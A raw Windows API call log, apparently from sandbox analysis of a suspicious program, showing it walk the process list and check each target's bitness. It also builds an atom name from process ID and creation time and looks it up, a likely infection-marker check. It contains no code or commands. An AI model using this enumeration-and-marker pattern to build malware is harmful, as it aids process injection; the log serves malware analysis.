	[0072.892] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.892] CloseHandle (hObject=0x224) returned 1
	[0072.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.892] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.892] CloseHandle (hObject=0x224) returned 1
	[0072.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.892] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.892] CloseHandle (hObject=0x224) returned 1
	[0072.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.892] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.892] CloseHandle (hObject=0x224) returned 1
	[0072.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eab8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.893] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.893] CloseHandle (hObject=0x224) returned 1
	[0072.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.893] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.893] CloseHandle (hObject=0x224) returned 1
	[0072.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.893] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.893] CloseHandle (hObject=0x224) returned 1
	[0072.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.893] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.893] CloseHandle (hObject=0x224) returned 1
	[0072.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.893] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.893] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.893] CloseHandle (hObject=0x224) returned 1
	[0072.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7289f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.894] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.894] CloseHandle (hObject=0x224) returned 1
	[0072.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e8b0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.894] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.894] CloseHandle (hObject=0x224) returned 1
	[0072.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.894] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.894] CloseHandle (hObject=0x224) returned 1
	[0072.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.894] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.894] GetLastError () returned 0x5
	[0072.894] GetLastError () returned 0x5
	[0072.894] GetLastError () returned 0x5
	[0072.894] GetLastError () returned 0x5
	[0072.894] GetLastError () returned 0x5
	[0072.894] GetLastError () returned 0x5
	[0072.894] GetLastError () returned 0x5
	[0072.894] GetLastError () returned 0x5
	[0072.894] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetLastError () returned 0x5
	[0072.895] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.896] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.896] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.896] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.897] GetLastError () returned 0x5
	[0072.898] GetLastError () returned 0x5
	[0072.898] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.898] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.898] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.898] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.898] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.898] CloseHandle (hObject=0x224) returned 1
	[0072.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.898] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.898] CloseHandle (hObject=0x224) returned 1
	[0072.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.898] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.899] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.899] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.899] CloseHandle (hObject=0x224) returned 1
	[0072.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0072.932] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772170, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0072.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.936] CloseHandle (hObject=0x224) returned 1
	[0072.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728978, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.936] CloseHandle (hObject=0x224) returned 1
	[0072.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7289f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.936] CloseHandle (hObject=0x224) returned 1
	[0072.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.937] CloseHandle (hObject=0x224) returned 1
	[0072.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.937] CloseHandle (hObject=0x224) returned 1
